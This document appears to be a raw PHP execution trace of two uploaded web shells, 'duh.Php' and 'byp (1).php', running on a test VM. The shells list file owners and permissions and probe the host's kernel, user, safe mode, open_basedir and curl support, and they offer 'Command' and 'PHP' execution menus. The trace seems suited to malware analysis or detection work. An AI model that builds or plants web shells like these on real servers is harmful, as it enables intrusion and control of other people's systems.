2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004320 494440 filegroup 0 /var/www/html/uploads/duh.Php 41 1 '..'
2 97 1 0.004333 494480
2 97 R 0
2 98 0 0.004345 494440 posix_getgrgid 0 /var/www/html/uploads/duh.Php 41 1 0
2 98 1 0.004366 495096
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004404 494504 realpath 0 /var/www/html/uploads/duh.Php 41 1 '..'
2 99 1 0.004418 494576
2 99 R '/var/www/html'
2 100 0 0.004433 494600 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 100 1 0.004445 494680
2 100 R '/var/www/html/uploads'
2 101 0 0.004460 494664 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 101 1 0.004472 494744
2 101 R '/var/www/html/uploads'
2 102 0 0.004487 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 102 1 0.004499 495160
2 102 R '/var/www/html/uploads'
2 103 0 0.004513 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 '..'
2 103 1 0.004526 495152
2 103 R '/var/www/html'
2 104 0 0.004540 495336 get_color 1 /var/www/html/uploads/duh.Php 41 1 '..'
3 105 0 0.004552 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '..'
3 105 1 0.004567 495376
3 105 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = '#ccff00'
3 106 0 0.004591 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '..'
3 106 1 0.004605 495376
3 106 R TRUE
3 107 0 0.004618 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '..'
3 107 1 0.004631 495376
3 107 R TRUE
2 104 1 0.004644 495336
2 104 R '#ccff00'
2 108 0 0.004658 495336 perms 1 /var/www/html/uploads/duh.Php 41 1 '..'
3 109 0 0.004670 495336 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '..'
3 109 1 0.004683 495376
3 109 R TRUE
3 110 0 0.004696 495336 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '..'
3 110 1 0.004708 495376
3 110 R 16895
3 111 0 0.004720 495336 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 111 1 0.004733 495720
3 111 R '40777'
3 112 0 0.004746 495656 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 112 1 0.004759 495752
3 112 R '0777'
2 108 1 0.004771 495368
2 108 R '0777'
2 113 0 0.004784 495464 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 113 1 0.004798 495544
2 113 R '/var/www/html/uploads'
2 114 0 0.004812 495464 realpath 0 /var/www/html/uploads/duh.Php 41 1 '..'
2 114 1 0.004825 495536
2 114 R '/var/www/html'
2 115 0 0.004839 495720 perms 1 /var/www/html/uploads/duh.Php 41 1 '..'
3 116 0 0.004851 495720 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '..'
3 116 1 0.004865 495760
3 116 R TRUE
3 117 0 0.004878 495720 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '..'
3 117 1 0.004890 495760
3 117 R 16895
3 118 0 0.004902 495720 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 118 1 0.004915 496104
3 118 R '40777'
3 119 0 0.004928 496040 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 119 1 0.004940 496136
3 119 R '0777'
2 115 1 0.004953 495752
2 115 R '0777'
1 A /var/www/html/uploads/duh.Php 41 $i++
2 120 0 0.004977 494440 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getpwuid'
2 120 1 0.004990 494480
2 120 R TRUE
2 121 0 0.005002 494440 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getgrgid'
2 121 1 0.005015 494480
2 121 R TRUE
2 122 0 0.005027 494440 fileowner 0 /var/www/html/uploads/duh.Php 41 1 'data'
2 122 1 0.005041 494480
2 122 R 0
2 123 0 0.005053 494440 posix_getpwuid 0 /var/www/html/uploads/duh.Php 41 1 0
2 123 1 0.005076 495240
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005116 494440 filegroup 0 /var/www/html/uploads/duh.Php 41 1 'data'
2 124 1 0.005128 494480
2 124 R 0
2 125 0 0.005140 494440 posix_getgrgid 0 /var/www/html/uploads/duh.Php 41 1 0
2 125 1 0.005165 495096
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005199 494520 realpath 0 /var/www/html/uploads/duh.Php 41 1 'data'
2 126 1 0.005215 494608
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005230 494632 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 127 1 0.005243 494712
2 127 R '/var/www/html/uploads'
2 128 0 0.005257 494696 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 128 1 0.005269 494776
2 128 R '/var/www/html/uploads'
2 129 0 0.005283 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 129 1 0.005295 495160
2 129 R '/var/www/html/uploads'
2 130 0 0.005309 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 'data'
2 130 1 0.005321 495168
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005336 495464 get_color 1 /var/www/html/uploads/duh.Php 41 1 'data'
3 132 0 0.005348 495464 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'data'
3 132 1 0.005363 495504
3 132 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = '#ccff00'
3 133 0 0.005386 495464 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'data'
3 133 1 0.005400 495504
3 133 R TRUE
3 134 0 0.005412 495464 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'data'
3 134 1 0.005426 495504
3 134 R TRUE
2 131 1 0.005438 495464
2 131 R '#ccff00'
2 135 0 0.005452 495464 perms 1 /var/www/html/uploads/duh.Php 41 1 'data'
3 136 0 0.005464 495464 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'data'
3 136 1 0.005477 495504
3 136 R TRUE
3 137 0 0.005490 495464 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'data'
3 137 1 0.005502 495504
3 137 R 16895
3 138 0 0.005515 495464 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 138 1 0.005528 495848
3 138 R '40777'
3 139 0 0.005540 495784 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 139 1 0.005553 495880
3 139 R '0777'
2 135 1 0.005565 495496
2 135 R '0777'
2 140 0 0.005578 495464 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 140 1 0.005591 495544
2 140 R '/var/www/html/uploads'
2 141 0 0.005605 495720 realpath 0 /var/www/html/uploads/duh.Php 41 1 'data'
2 141 1 0.005618 495808
2 141 R '/var/www/html/uploads/data'
2 142 0 0.005632 495720 perms 1 /var/www/html/uploads/duh.Php 41 1 'data'
3 143 0 0.005644 495720 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'data'
3 143 1 0.005658 495760
3 143 R TRUE
3 144 0 0.005671 495720 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'data'
3 144 1 0.005683 495760
3 144 R 16895
3 145 0 0.005695 495720 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 145 1 0.005708 496104
3 145 R '40777'
3 146 0 0.005720 496040 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 146 1 0.005733 496136
3 146 R '0777'
2 142 1 0.005745 495752
2 142 R '0777'
1 A /var/www/html/uploads/duh.Php 41 $i++
2 147 0 0.005873 494440 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getpwuid'
2 147 1 0.005888 494480
2 147 R TRUE
2 148 0 0.005900 494440 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getgrgid'
2 148 1 0.005913 494480
2 148 R TRUE
2 149 0 0.005926 494440 fileowner 0 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
2 149 1 0.005940 494488
2 149 R 0
2 150 0 0.005952 494448 posix_getpwuid 0 /var/www/html/uploads/duh.Php 42 1 0
2 150 1 0.005975 495248
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006015 494448 filegroup 0 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
2 151 1 0.006032 494488
2 151 R 0
2 152 0 0.006044 494448 posix_getgrgid 0 /var/www/html/uploads/duh.Php 42 1 0
2 152 1 0.006065 495104
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006099 494528 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 153 1 0.006113 494608
2 153 R '/var/www/html/uploads'
2 154 0 0.006128 494640 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 154 1 0.006141 494720
2 154 R '/var/www/html/uploads'
2 155 0 0.006155 494704 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 155 1 0.006167 494784
2 155 R '/var/www/html/uploads'
2 156 0 0.006182 495088 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 156 1 0.006194 495168
2 156 R '/var/www/html/uploads'
2 157 0 0.006208 495216 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
2 157 1 0.006240 495304
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006258 495472 get_color 1 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
3 159 0 0.006271 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.htaccess'
3 159 1 0.006287 495512
3 159 R FALSE
3 160 0 0.006300 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.htaccess'
3 160 1 0.006315 495512
3 160 R FALSE
3 161 0 0.006327 495472 is_readable 0 /var/www/html/uploads/duh.Php 56 1 '.htaccess'
3 161 1 0.006341 495512
3 161 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = ''
3 162 0 0.006367 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.htaccess'
3 162 1 0.006381 495512
3 162 R FALSE
3 163 0 0.006394 495472 is_readable 0 /var/www/html/uploads/duh.Php 56 1 '.htaccess'
3 163 1 0.006407 495512
3 163 R TRUE
2 158 1 0.006420 495472
2 158 R ''
2 164 0 0.006433 495472 perms 1 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
3 165 0 0.006445 495472 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '.htaccess'
3 165 1 0.006459 495512
3 165 R TRUE
3 166 0 0.006472 495472 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '.htaccess'
3 166 1 0.006484 495512
3 166 R 33188
3 167 0 0.006497 495472 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33188
3 167 1 0.006510 495856
3 167 R '100644'
3 168 0 0.006523 495792 substr 0 /var/www/html/uploads/duh.Php 57 2 '100644' -4
3 168 1 0.006535 495888
3 168 R '0644'
2 164 1 0.006548 495504
2 164 R '0644'
2 169 0 0.006561 495728 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 169 1 0.006574 495808
2 169 R '/var/www/html/uploads'
2 170 0 0.006589 495728 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
2 170 1 0.006602 495816
2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.006617 495728 perms 1 /var/www/html/uploads/duh.Php 42 1 '.htaccess'
3 172 0 0.006629 495728 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '.htaccess'
3 172 1 0.006643 495768
3 172 R TRUE
3 173 0 0.006656 495728 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '.htaccess'
3 173 1 0.006668 495768
3 173 R 33188
3 174 0 0.006680 495728 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33188
3 174 1 0.006693 496112
3 174 R '100644'
3 175 0 0.006705 496048 substr 0 /var/www/html/uploads/duh.Php 57 2 '100644' -4
3 175 1 0.006718 496144
3 175 R '0644'
2 171 1 0.006731 495760
2 171 R '0644'
2 176 0 0.006745 494448 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getpwuid'
2 176 1 0.006759 494488
2 176 R TRUE
2 177 0 0.006771 494448 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getgrgid'
2 177 1 0.006784 494488
2 177 R TRUE
2 178 0 0.006796 494448 fileowner 0 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
2 178 1 0.006810 494480
2 178 R 1000
2 179 0 0.006822 494440 posix_getpwuid 0 /var/www/html/uploads/duh.Php 42 1 1000
2 179 1 0.006857 495256
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.006900 494456 filegroup 0 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
2 180 1 0.006913 494496
2 180 R 1000
2 181 0 0.006925 494456 posix_getgrgid 0 /var/www/html/uploads/duh.Php 42 1 1000
2 181 1 0.006956 495112
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/duh.Php 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.006990 494536 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 182 1 0.007004 494616
2 182 R '/var/www/html/uploads'
2 183 0 0.007019 494648 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 183 1 0.007031 494728
2 183 R '/var/www/html/uploads'
2 184 0 0.007046 494712 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 184 1 0.007058 494792
2 184 R '/var/www/html/uploads'
2 185 0 0.007072 495096 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 185 1 0.007084 495176
2 185 R '/var/www/html/uploads'
2 186 0 0.007098 495224 realpath 0 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
2 186 1 0.007110 495312
2 186 R '/var/www/html/uploads/duh.Php'
2 187 0 0.007126 495480 get_color 1 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
3 188 0 0.007138 495480 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'duh.Php'
3 188 1 0.007153 495520
3 188 R FALSE
3 189 0 0.007166 495480 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'duh.Php'
3 189 1 0.007179 495520
3 189 R FALSE
3 190 0 0.007192 495480 is_readable 0 /var/www/html/uploads/duh.Php 56 1 'duh.Php'
3 190 1 0.007205 495520
3 190 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = ''
3 191 0 0.007230 495480 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'duh.Php'
3 191 1 0.007243 495520
3 191 R FALSE
3 192 0 0.007256 495480 is_readable 0 /var/www/html/uploads/duh.Php 56 1 'duh.Php'
3 192 1 0.007269 495520
3 192 R TRUE
2 187 1 0.007282 495480
2 187 R ''
2 193 0 0.007295 495480 perms 1 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
3 194 0 0.007306 495480 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'duh.Php'
3 194 1 0.007319 495520
3 194 R TRUE
3 195 0 0.007332 495480 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'duh.Php'
3 195 1 0.007343 495520
3 195 R 33204
3 196 0 0.007355 495480 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33204
3 196 1 0.007368 495864
3 196 R '100664'
3 197 0 0.007381 495800 substr 0 /var/www/html/uploads/duh.Php 57 2 '100664' -4
3 197 1 0.007394 495896
3 197 R '0664'
2 193 1 0.007407 495512
2 193 R '0664'
2 198 0 0.007419 495736 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 198 1 0.007433 495816
2 198 R '/var/www/html/uploads'
2 199 0 0.007447 495736 realpath 0 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
2 199 1 0.007459 495824
2 199 R '/var/www/html/uploads/duh.Php'
2 200 0 0.007474 495736 perms 1 /var/www/html/uploads/duh.Php 42 1 'duh.Php'
3 201 0 0.007485 495736 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'duh.Php'
3 201 1 0.007498 495776
3 201 R TRUE
3 202 0 0.007511 495736 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'duh.Php'
3 202 1 0.007523 495776
3 202 R 33204
3 203 0 0.007535 495736 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33204
3 203 1 0.007548 496120
3 203 R '100664'
3 204 0 0.007561 496056 substr 0 /var/www/html/uploads/duh.Php 57 2 '100664' -4
3 204 1 0.007573 496152
3 204 R '0664'
2 200 1 0.007586 495768
2 200 R '0664'
2 205 0 0.007600 494456 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getpwuid'
2 205 1 0.007617 494496
2 205 R TRUE
2 206 0 0.007630 494456 function_exists 0 /var/www/html/uploads/duh.Php 42 1 'posix_getgrgid'
2 206 1 0.007642 494496
2 206 R TRUE
2 207 0 0.007654 494456 fileowner 0 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
2 207 1 0.007668 494504
2 207 R 0
2 208 0 0.007681 494464 posix_getpwuid 0 /var/www/html/uploads/duh.Php 42 1 0
2 208 1 0.007703 495264
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.007743 494448 filegroup 0 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
2 209 1 0.007756 494488
2 209 R 0
2 210 0 0.007768 494448 posix_getgrgid 0 /var/www/html/uploads/duh.Php 42 1 0
2 210 1 0.007789 495104
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.007822 494528 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 211 1 0.007836 494608
2 211 R '/var/www/html/uploads'
2 212 0 0.007851 494672 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 212 1 0.007863 494752
2 212 R '/var/www/html/uploads'
2 213 0 0.007877 494768 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 213 1 0.007890 494848
2 213 R '/var/www/html/uploads'
2 214 0 0.007904 495088 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 214 1 0.007916 495168
2 214 R '/var/www/html/uploads'
2 215 0 0.007930 495216 realpath 0 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
2 215 1 0.007943 495312
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.007958 495472 get_color 1 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
3 217 0 0.007971 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'prepend.php'
3 217 1 0.007985 495512
3 217 R FALSE
3 218 0 0.007999 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'prepend.php'
3 218 1 0.008013 495512
3 218 R FALSE
3 219 0 0.008025 495472 is_readable 0 /var/www/html/uploads/duh.Php 56 1 'prepend.php'
3 219 1 0.008039 495512
3 219 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = ''
3 220 0 0.008063 495472 is_writable 0 /var/www/html/uploads/duh.Php 56 1 'prepend.php'
3 220 1 0.008077 495512
3 220 R FALSE
3 221 0 0.008090 495472 is_readable 0 /var/www/html/uploads/duh.Php 56 1 'prepend.php'
3 221 1 0.008103 495512
3 221 R TRUE
2 216 1 0.008116 495472
2 216 R ''
2 222 0 0.008129 495472 perms 1 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
3 223 0 0.008141 495472 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'prepend.php'
3 223 1 0.008155 495512
3 223 R TRUE
3 224 0 0.008168 495472 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'prepend.php'
3 224 1 0.008180 495512
3 224 R 33261
3 225 0 0.008192 495472 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33261
3 225 1 0.008212 495856
3 225 R '100755'
3 226 0 0.008225 495792 substr 0 /var/www/html/uploads/duh.Php 57 2 '100755' -4
3 226 1 0.008238 495888
3 226 R '0755'
2 222 1 0.008251 495504
2 222 R '0755'
2 227 0 0.008263 495728 realpath 0 /var/www/html/uploads/duh.Php 42 1 '.'
2 227 1 0.008277 495808
2 227 R '/var/www/html/uploads'
2 228 0 0.008291 495728 realpath 0 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
2 228 1 0.008304 495824
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008318 495728 perms 1 /var/www/html/uploads/duh.Php 42 1 'prepend.php'
3 230 0 0.008330 495728 file_exists 0 /var/www/html/uploads/duh.Php 57 1 'prepend.php'
3 230 1 0.008345 495768
3 230 R TRUE
3 231 0 0.008358 495728 fileperms 0 /var/www/html/uploads/duh.Php 57 1 'prepend.php'
3 231 1 0.008371 495768
3 231 R 33261
3 232 0 0.008388 495728 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 33261
3 232 1 0.008401 496112
3 232 R '100755'
3 233 0 0.008414 496048 substr 0 /var/www/html/uploads/duh.Php 57 2 '100755' -4
3 233 1 0.008426 496144
3 233 R '0755'
2 229 1 0.008439 495760
2 229 R '0755'
1 3 1 0.008459 494448
0.008504 347168
TRACE END [2023-02-12 23:45:06.790057]
data/traces/d1f9301980fe3353e9ad011975f546ec_trace-1676254057.3297.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:08:03.227524]
1 0 1 0.000280 393528
1 3 0 0.001041 487640 {main} 1 /var/www/html/uploads/byp (1).php 0 0
2 4 0 0.001064 487640 error_reporting 0 /var/www/html/uploads/byp (1).php 2 1 0
2 4 1 0.001080 487680
2 4 R 22527
1 A /var/www/html/uploads/byp (1).php 3 $xyn = 'tunafeesh'
2 5 0 0.001112 487640 basename 0 /var/www/html/uploads/byp (1).php 6 1 '/var/www/html/uploads/byp (1).php'
2 5 1 0.001128 487712
2 5 R 'byp (1).php'
1 A /var/www/html/uploads/byp (1).php 6 $me = 'byp (1).php'
1 A /var/www/html/uploads/byp (1).php 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.001165 487680 php_uname 0 /var/www/html/uploads/byp (1).php 6 0
2 6 1 0.001179 487792
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/byp (1).php 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.001213 487792 get_current_user 0 /var/www/html/uploads/byp (1).php 6 0
2 7 1 0.001251 487832
2 7 R 'osboxes'
2 8 0 0.001266 487840 getmyuid 0 /var/www/html/uploads/byp (1).php 6 0
2 8 1 0.001278 487840
2 8 R 1000
2 9 0 0.001291 487848 getmygid 0 /var/www/html/uploads/byp (1).php 6 0
2 9 1 0.001302 487848
2 9 R 1000
1 A /var/www/html/uploads/byp (1).php 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.001326 487856 ini_get 0 /var/www/html/uploads/byp (1).php 6 1 'safe_mode'
2 10 1 0.001340 487888
2 10 R FALSE
1 A /var/www/html/uploads/byp (1).php 6 $safe_mode = FALSE
1 A /var/www/html/uploads/byp (1).php 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.001376 487856 getcwd 0 /var/www/html/uploads/byp (1).php 6 0
2 11 1 0.001389 487904
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/byp (1).php 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/byp (1).php 6 $bckC = '#333333'
1 A /var/www/html/uploads/byp (1).php 6 $txtC = '#999999'
2 12 0 0.001435 487904 getenv 0 /var/www/html/uploads/byp (1).php 7 1 'HTTP_HOST'
2 12 1 0.001449 487976
2 12 R 'localhost'
1 A /var/www/html/uploads/byp (1).php 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001491 490080 realpath 0 /var/www/html/uploads/byp (1).php 8 1 '.'
2 13 1 0.001505 490160
2 13 R '/var/www/html/uploads'
2 14 0 0.001521 490144 realpath 0 /var/www/html/uploads/byp (1).php 8 1 '.'
2 14 1 0.001534 490224
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/byp (1).php 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="byp (1).php">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/byp (1).php 8 $end = '</body></html>'
1 A /var/www/html/uploads/byp (1).php 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001603 490720 phpversion 0 /var/www/html/uploads/byp (1).php 10 0
2 15 1 0.001616 490784
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001631 491480 zend_version 0 /var/www/html/uploads/byp (1).php 10 0
2 16 1 0.001643 491512
2 16 R '3.2.0'
2 17 0 0.001657 491512 magic_quotes 1 /var/www/html/uploads/byp (1).php 10 0
3 18 0 0.001669 491512 get_magic_quotes_gpc 0 /var/www/html/uploads/byp (1).php 46 0
3 18 1 0.001682 491512
3 18 R FALSE
2 A /var/www/html/uploads/byp (1).php 46 $x = FALSE
2 A /var/www/html/uploads/byp (1).php 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001718 491512
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001741 491512 curl 1 /var/www/html/uploads/byp (1).php 10 0
3 20 0 0.001752 491512 extension_loaded 0 /var/www/html/uploads/byp (1).php 47 1 'curl'
3 20 1 0.001765 491552
3 20 R TRUE
2 A /var/www/html/uploads/byp (1).php 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001790 491512
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001805 491512 reg_globals 1 /var/www/html/uploads/byp (1).php 10 0
3 22 0 0.001817 491512 ini_get 0 /var/www/html/uploads/byp (1).php 48 1 'reqister_globals'
3 22 1 0.001831 491544
3 22 R FALSE
2 A /var/www/html/uploads/byp (1).php 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001855 491512
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001870 491512 openbase_dir 1 /var/www/html/uploads/byp (1).php 10 0
3 24 0 0.001881 491512 ini_get 0 /var/www/html/uploads/byp (1).php 45 1 'open_basedir'
3 24 1 0.001895 491544
3 24 R ''
2 A /var/www/html/uploads/byp (1).php 45 $x = ''
2 A /var/www/html/uploads/byp (1).php 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001929 491512
2 23 R '<font color=#ccff00>OFF</font>'
